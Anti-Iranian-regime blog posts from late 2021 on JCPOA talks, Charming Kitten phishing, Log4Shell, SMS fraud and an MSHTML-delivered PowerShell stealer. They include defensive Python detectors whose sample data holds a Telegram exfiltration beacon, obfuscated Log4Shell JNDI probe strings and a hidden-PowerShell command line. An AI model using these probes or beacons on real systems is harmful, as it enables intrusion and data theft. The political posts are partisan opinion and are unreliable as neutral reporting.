Thursday, December 30, 2021

JCPOA Negotiations: How the Iranian regime's delegation in Vienna is leading its world partners down a path of deceit and delay 🤬🤬🤬


JCPOA Vienna Talks (Image credit: Foreign Brief) 

Private talks in Vienna between Iran and the Western powers, aimed at reviving the nuclear deal reached in 2015, have been going on for some time, but there have been reports of numerous differences between the two sides. E3 diplomats say the Iranian regime's delegation is unwilling to negotiate genuinely, and as Iran's deceptive regime continues to stockpile enriched uranium, they warn that the nuclear deal will become a hollow shell in the not-too-distant future.

Iran's response to these allegations is, as usual, deceptive and evasive: it says that diplomacy is a two-way street and goes so far as to accuse the Western powers of playing the blame game. But the reality, as usual, is very different. Leaked notes from these talks indicate that the Iranian regime wants all US sanctions lifted, regardless of whether they were imposed because of the nuclear deal. 🤦‍♂️🤦‍♂️

It is clear that this delegation, and by proxy this evil regime of mullahs, has no interest in negotiating with the Western powers in this regard. They continue to delay and deceive their partners into thinking that an agreement can be reached, while behind the scenes they continue to stockpile uranium for nuclear weapons. This is so BAD! The Western powers must be ready to withdraw from these negotiations and take further measures to eliminate this regime.

The innocent people of Iran suffer every day because the Western powers fail to act. 😭😭

Wednesday, December 22, 2021

Charming Kitten AKA APT35 activity up sharply in 2021: Google issues public warning

It has been reported that Charming Kitten, also known as APT35, a group in the service of this corrupt Iranian regime, has steadily increased its cyber attacks this year and made those attacks more sophisticated. Google has now issued a public warning against the group.

Charming Kitten became notorious in 2020 for phishing the accounts of US presidential campaign staff in the run-up to the 2020 US presidential election, and they continued their evil ways in 2021. They harvested credentials by hosting a phishing kit on a compromised website of a British university, SOAS, and tried to distribute spyware disguised as a VPN app through app stores. They also used the Telegram Bot API's sendMessage method, called from JavaScript embedded in their phishing pages, to learn the IP addresses and whereabouts of victims who clicked on their phishing links, and they pretended to be officials of the Munich Security Conference and of the Think-20 (T20) conference here at home in Italy to send malicious phishing links to innocent victims.
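To make the Telegram trick concrete, here is a small Python script I have added to this post (it is my own example, not code from Google's report, from the attackers, or from anywhere else in this blog) that scans a phishing page's HTML/JavaScript for calls to the Telegram Bot API sendMessage method and pulls out the bot token and chat ID, which is what a defender wants in order to block the beacon and report the bot. The page source inside it is constructed for the example and the token is fake.

```python
"""Find Telegram Bot API beacons in phishing-page source.
Added example, not code from Google's report or from the original post."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Bot API calls look like https://api.telegram.org/bot<token>/<method>
# A token is "<numeric bot id>:<secret>"; the secret is ~35 URL-safe characters.
TOKEN_RE = r"(\d{6,12}:[A-Za-z0-9_-]{30,45})"
BEACON_RE = re.compile(
    r"api\.telegram\.org/bot" + TOKEN_RE + r"/(sendMessage|sendDocument|sendPhoto)",
    re.IGNORECASE,
)
CHAT_ID_RE = re.compile(r"chat_id\s*[=:]\s*['\"]?(-?\d{5,20})")
# Fields phishing kits commonly stuff into the "text" parameter
EXFIL_HINT_RE = re.compile(r"\b(ip|useragent|user_agent|password|pass)\b", re.IGNORECASE)


@dataclass(frozen=True)
class Beacon:
    bot_id: str                   # numeric part of the token; stable identifier for the bot
    token: str                    # full token (sensitive: whoever holds it controls the bot)
    method: str                   # Bot API method called
    chat_id: Optional[str]        # destination chat, if it appears near the call
    exfil_hints: Tuple[str, ...]  # data fields referenced near the call


def find_telegram_beacons(source: str, window: int = 800) -> List[Beacon]:
    """Return one Beacon per Bot API call found in the page source."""
    found: List[Beacon] = []
    for m in BEACON_RE.finditer(source):
        token, method = m.group(1), m.group(2)
        # Inspect the code around the call for chat_id and the fields being sent
        lo, hi = max(0, m.start() - window), min(len(source), m.end() + window)
        ctx = source[lo:hi]
        chat = CHAT_ID_RE.search(ctx)
        hints = tuple(dict.fromkeys(h.lower() for h in EXFIL_HINT_RE.findall(ctx)))
        found.append(Beacon(token.split(":", 1)[0], token, method,
                            chat.group(1) if chat else None, hints))
    return found


def indicators(beacons: List[Beacon]) -> List[str]:
    """Shareable indicator lines with the token secret left out."""
    return [f"telegram bot {b.bot_id} chat_id={b.chat_id or '?'} via {b.method}; "
            f"fields={','.join(b.exfil_hints) or 'n/a'}" for b in beacons]


# Constructed phishing-kit snippet for this example; token and chat_id are fake.
SAMPLE_PAGE = r"""
<form id="login"><input name="email"><input name="password" type="password"></form>
<script>
fetch("https://api.ipify.org?format=json").then(r => r.json()).then(j => {
  const ip = j.ip;
  const text = "visitor " + ip + " " + navigator.userAgent + " " + navigator.language;
  fetch("https://api.telegram.org/bot123456789:AAFakeTokenFakeTokenFakeTokenFake0/sendMessage"
        + "?chat_id=-1001234567890&text=" + encodeURIComponent(text));
});
</script>
"""

if __name__ == "__main__":
    for line in indicators(find_telegram_beacons(SAMPLE_PAGE)):
        print(line)
```

The bot ID and chat ID are the durable pieces: the operators can rotate a phishing domain in minutes, but the same bot tends to be reused across kits, so it is worth keeping in a blocklist and passing to Telegram's abuse channel.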

Google has issued a public warning about state-sponsored cyber attacks

It is a worrying trend that Google feels the threat posed by Charming Kitten is serious enough to warrant a public announcement, because the sophistication of this horrific group's attacks is increasing. When will this corrupt regime stop trying to turn the lives of others into hell??? 😡😡



Wednesday, December 15, 2021

Log4Shell: the Log4j zero-day vulnerability is a cybersecurity disaster!! and cyber criminals and hostile regimes are the big winners 😟🤦‍♂️



The whole cybersecurity and InfoSec community has been talking about Log4Shell since the news broke last Friday. Log4j is an Apache project, a Java-based logging library that has been around for about 20 years. The vulnerability, CVE-2021-44228, abuses Log4j's message lookup feature: if an attacker can get a string such as ${jndi:ldap://attacker-host/x} written into a log message (for example through a User-Agent header or a username field), vulnerable versions of Log4j 2 resolve the lookup by making a JNDI request to the attacker's LDAP (or RMI) server. That server can answer with a reference to a remote Java class, which the victim's JVM then downloads and executes. The result is unauthenticated remote code execution (RCE): the attacker can run whatever code he or she wishes on the server.
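Because the whole attack hinges on that ${jndi:...} string appearing in a log, the most useful first check is to look for it in your own logs. The Python below is an example I have added (it is mine, not code from Apache or any vendor) that scans web-server log lines for a JNDI lookup; it goes a step beyond the plain pattern by first undoing the common Log4j lookup obfuscations (${lower:...}, ${upper:...} and ${...:-default}) that attackers use to slip past naive string matching. The log lines are constructed for the example.

```python
"""Detect Log4Shell (CVE-2021-44228) probes in log lines, including the common
lookup-obfuscation tricks. Added example, not code from Apache or any vendor."""
import re
from typing import List, Optional, Tuple

# Innermost ${...} lookup: a body with no nested "${" or braces
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After normalisation, a JNDI lookup with one of the protocols seen in the wild
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)
_KEEP = "\x00{"  # temporary marker for lookups we leave in place


def _resolve_inner(m: re.Match) -> str:
    """Evaluate the Log4j lookups attackers use purely for obfuscation."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("lower:"):          # ${lower:J} -> j
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):          # ${upper:n} -> N
        return body[len("upper:"):].upper()
    if ":-" in body:                      # ${env:NOPE:-j} or ${::-j} -> default value j
        return body.split(":-", 1)[1]
    return _KEEP + body + "}"             # jndi:, sys:, unknown: keep, but stop re-matching


def normalize_lookups(text: str) -> str:
    """Collapse obfuscating lookups, innermost first, until the string stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = INNER_LOOKUP.sub(_resolve_inner, text)
    return text.replace(_KEEP, "${")


def scan_line(line: str) -> Optional[Tuple[str, str]]:
    """(protocol, normalised line) if the line carries a JNDI lookup, else None."""
    norm = normalize_lookups(line)
    m = JNDI_RE.search(norm)
    return (m.group(1).lower(), norm) if m else None


def find_probes(lines: List[str]) -> List[Tuple[int, str]]:
    """(line index, protocol) for every line that contains a Log4Shell probe."""
    hits = []
    for i, line in enumerate(lines):
        r = scan_line(line)
        if r:
            hits.append((i, r[0]))
    return hits


# Constructed access-log lines for this example (TEST-NET addresses, no real hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - "GET /?q=${jndi:ldap://198.51.100.7:1389/a} HTTP/1.1" 200 "-"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-l}${env:NOPE:-d}ap://198.51.100.7/x}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${lower:${::-J}}NDI:RMI://198.51.100.7/y}"',
    '203.0.113.4 - - "GET /?price=${amount} HTTP/1.1" 200 "-"',
]

if __name__ == "__main__":
    for idx, proto in find_probes(SAMPLE_LOG):
        print(f"line {idx}: JNDI/{proto} probe -> {scan_line(SAMPLE_LOG[idx])[1]}")
```

This is a triage aid, not a defence: attackers can lean on other lookups and encodings the normaliser does not model, and a match in your logs only tells you someone tried. The fix is upgrading Log4j, and any host that logged a probe while running a vulnerable version should be treated as possibly compromised.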

Diagram showing Log4j / CVE-2021-44228 vulnerability (image credit: Juniper Threat Labs)  


If only a few companies used Log4j, this would be a minor issue. However, because Log4j has been around for so long and is embedded in so much software, hundreds of thousands of organisations that store millions of records, including government websites and even Minecraft servers, are at risk. Another big problem is that older versions of Log4j are buried inside many legacy systems, and identifying and repairing them will cost millions.

It is clear that Log4Shell is one of the biggest disasters in cybersecurity, and criminals are already using it. The RCE exploit is reported to have been used in the wild for at least 9 days before the zero-day became public, and ransomware attacks linked to Log4Shell have also begun to appear. Now is the time for cybercriminals and hostile government actors to steal citizens' data and exploit it for criminal ends. 😡😡

Please, friends, update your Log4j packages to the patched release, and keep lobbying the companies that store your data to make sure they do their best to keep it safe. 🙏🙏

Thursday, December 9, 2021

Iranian citizens once again targeted by criminal SMS fraud impersonating the government

The state Radio and Television Agency has reported that tens of thousands of Iranian citizens have been targeted for financial fraud by text messages impersonating the Iranian government.

The scam works like this: cyber criminals send an SMS containing a forged hyperlink that claims to lead to Sana, the Iranian judiciary's electronic notification system. The message is worded to intimidate the recipient into downloading an application and paying a fee for a supposed service. Once the victim has installed the app and entered their bank card details to pay, the criminals have everything they need to commit bank fraud against the victim, which typically nets between $1,000 and $2,000 per victim. 💰💰


Fraudulent Sana system application used by these cyber criminals

It has been reported that this is most likely the work of independent cybercriminals rather than government actors, but it is clear that the Iranian government's cyber security measures are so weak that they can easily be exploited to defraud the hardworking people of Iran. When will this corrupt regime stop wasting its time and money attacking other countries and instead spend them on improving its own cyber security? It is a shame at this stage, and in the end it is the innocent people of Iran who suffer.


Thursday, December 2, 2021

Iranian cyber actors exploiting Microsoft MSHTML Vulnerability to steal Google and Instagram credentials of Farsi Speakers

SafeBreach researchers report that a new Iranian cyber actor has used an exploit for the Microsoft MSHTML remote code execution (RCE) vulnerability to infect Farsi-speaking victims with a new malicious PowerShell script. The attackers rely on victims who have not patched CVE-2021-40444, an RCE vulnerability in the MSHTML browser engine that Office documents can invoke, which Microsoft patched in September 2021. The PowerShell script is only about 150 lines long but steals a great deal of very personal data from the victim: Telegram files and screenshots, as well as documents and information about the victim's system environment.


Snippet of the malicious PowerShell source code


The hackers are tied to the Iranian regime because the monitoring of victims' Telegram data is very similar to that of other Iranian hacker groups such as Infy, Ferocious Kitten and Rampant Kitten. To deliver the malicious PowerShell script, a Word document is dropped on the victim's system via a spear-phishing email. Based on the content of the malicious Word document, which displays an article blaming Khamenei for the ban on American and British vaccines, as well as the nature of the data collected, the victims are thought to be Iranians like me: living abroad and critical of the regime. About half of the victims are based in the United States.

Location of Iranian victims targeted (Source: SafeBreach)


These hackers have hunted their victims in two ways. The first was a phishing website, deltaban.com, which claims to be a legitimate travel agency but in fact prompts users to enter their Gmail and Instagram credentials; if an unsuspecting victim does so, those credentials are sent to a C2 server controlled by the hackers. The second way, mentioned above, takes three steps. 1. A spear-phishing email is sent with a malicious Word document attached. 2. When opened, the Word document contacts a malicious C2 server, executes rogue JavaScript through the MSHTML engine, and drops a .DLL file in the %temp% directory. 3. That malicious .DLL then executes the PowerShell script described above.
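As an added example (my own, not SafeBreach's code or anything from their report) of how a defender can catch that chain on an endpoint, the Python below walks a set of constructed process-creation events and flags any PowerShell (or other script host) whose parent chain leads back to an Office application within a few hops, plus any intermediate loader such as rundll32.exe or control.exe that loads a DLL or CPL from a Temp folder. Process IDs, paths and command lines are made up for the example; in a real deployment you would feed it Sysmon Event ID 1 or EDR telemetry and key on process GUIDs rather than PIDs, which Windows reuses.

```python
"""Flag Office -> (loader) -> script-host process chains, the shape of the
MSHTML delivery described above. Added example, not SafeBreach's code."""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
LOADERS = {"rundll32.exe", "control.exe", "regsvr32.exe"}
# A DLL/CPL loaded from a Temp directory, as described for the dropped DLL
TEMP_MODULE_RE = re.compile(r"\\temp\\[^\s\"']+\.(dll|cpl)\b", re.IGNORECASE)


@dataclass(frozen=True)
class Proc:
    pid: int       # real telemetry should key on ProcessGuid; PIDs get reused
    ppid: int
    image: str
    cmdline: str


def _name(image: str) -> str:
    return ntpath.basename(image).lower()


def office_to_script_chains(events: List[Proc], max_hops: int = 3) -> List[List[Proc]]:
    """Chains (oldest ancestor first) from an Office app to a script host within max_hops."""
    by_pid: Dict[int, Proc] = {e.pid: e for e in events}
    chains: List[List[Proc]] = []
    for e in events:
        if _name(e.image) not in SCRIPT_HOSTS:
            continue
        chain, cur = [e], e
        for _ in range(max_hops):
            parent = by_pid.get(cur.ppid)
            if parent is None:          # ancestor not in our window; give up quietly
                break
            chain.append(parent)
            if _name(parent.image) in OFFICE_APPS:
                chains.append(list(reversed(chain)))
                break
            cur = parent
    return chains


def temp_module_loaders(events: List[Proc]) -> List[Proc]:
    """Loader processes whose command line names a DLL/CPL under a Temp directory."""
    return [e for e in events
            if _name(e.image) in LOADERS and TEMP_MODULE_RE.search(e.cmdline)]


# Constructed process-creation events for this example (PIDs, paths, names are made up).
EVENTS = [
    Proc(1001, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(1200, 1001, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
         r'"WINWORD.EXE" /n "C:\Users\u\Downloads\attachment.docx"'),
    Proc(1300, 1200, r"C:\Windows\System32\control.exe",
         r"control.exe C:\Users\u\AppData\Local\Temp\loader.cpl"),
    Proc(1350, 1300, r"C:\Windows\System32\rundll32.exe",
         r"rundll32.exe C:\Users\u\AppData\Local\Temp\loader.dll,DllMain"),
    Proc(1400, 1350, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"powershell.exe -w hidden -ep bypass -f C:\Users\u\AppData\Local\Temp\s.ps1"),
    # benign: an admin opening PowerShell from Explorer
    Proc(1500, 1001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe Get-Process"),
    Proc(1600, 1001, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", '"EXCEL.EXE"'),
]

if __name__ == "__main__":
    for chain in office_to_script_chains(EVENTS):
        print("suspicious chain: " + " -> ".join(f"{_name(p.image)}({p.pid})" for p in chain))
    for p in temp_module_loaders(EVENTS):
        print(f"temp-module loader: {_name(p.image)}({p.pid}) {p.cmdline}")
```

The two checks are deliberately separate: an Office-to-PowerShell lineage is rare enough on most user desktops to alert on by itself, while a loader pulling a module out of Temp is a weaker signal that earns its keep as corroboration or as a hunting query over the last few days of telemetry.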

CVE-2021-40444 vulnerability


At present this corrupt regime seems to want to carry out cyber attacks on a daily basis, and it does not care whether these attacks harm the Iranian people. When will this madness end?? Please, friends, protect yourselves and install the latest patches so that these cyber attacks cannot steal your information. Stay safe, friends 🙏🙏



Original Report: https://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/